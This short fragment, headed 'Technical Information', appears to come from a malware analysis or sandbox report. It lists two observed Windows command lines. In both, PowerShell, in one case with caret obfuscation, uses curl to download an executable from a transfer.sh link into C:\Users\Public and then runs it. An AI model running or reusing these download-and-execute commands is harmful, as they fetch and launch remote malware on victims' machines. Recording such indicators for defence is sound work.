Technical Information
- '<SYSTEM32>\cmd.exe' /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/IGU4fLIe4D/aruy.e^xe -o C:\Users\Public\swrxd.exe;C:\Users\Public\swrxd.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' /W 01 curl https://transfer.sh/get/IGU4fLIe4D/aruy.exe -o C:\Users\Public\swrxd.exe;C:\Users\Public\swrxd.exe